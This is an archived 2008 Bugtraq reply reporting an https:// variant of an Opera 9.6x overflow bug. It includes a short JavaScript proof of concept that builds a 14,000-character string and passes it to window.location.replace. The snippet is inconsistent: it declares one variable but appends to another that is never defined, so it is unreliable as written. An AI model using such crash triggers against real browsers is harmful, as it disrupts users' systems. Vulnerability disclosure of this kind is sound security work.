<<< Date Index >>> <<< Thread Index >>>

Re: Opera 9.6x file:// overflow

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Re: Opera 9.6x file:// overflow
From: jplopezy@xxxxxxxxx
Date: 17 Nov 2008 22:40:33 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

hi

is very curious vulnerability...

I think I found a variant of this vulnerability, if using another protocol (eg: 
https ://).

I am sure that is an variant because providing other protocolos (eg: http://) 
does not work, nor the exceptions that are generated are equal to fail.


------------------ POC ---------------------
<script>

var evil = "https://";;

for(var i = 0; i<14000; i++)

code += "A";

window.location.replace(code);

</script>
------------------------------------------

Juan Pablo Lopez Yacubian

Prev by Date: rPSA-2008-0322-1 gnutls
Next by Date: [ MDVSA-2008:227-1 ] gnutls
Previous by thread: Opera 9.6x file:// overflow
Next by thread: Re: Re: Opera 9.6x file:// overflow
Index(es):
- Date
- Thread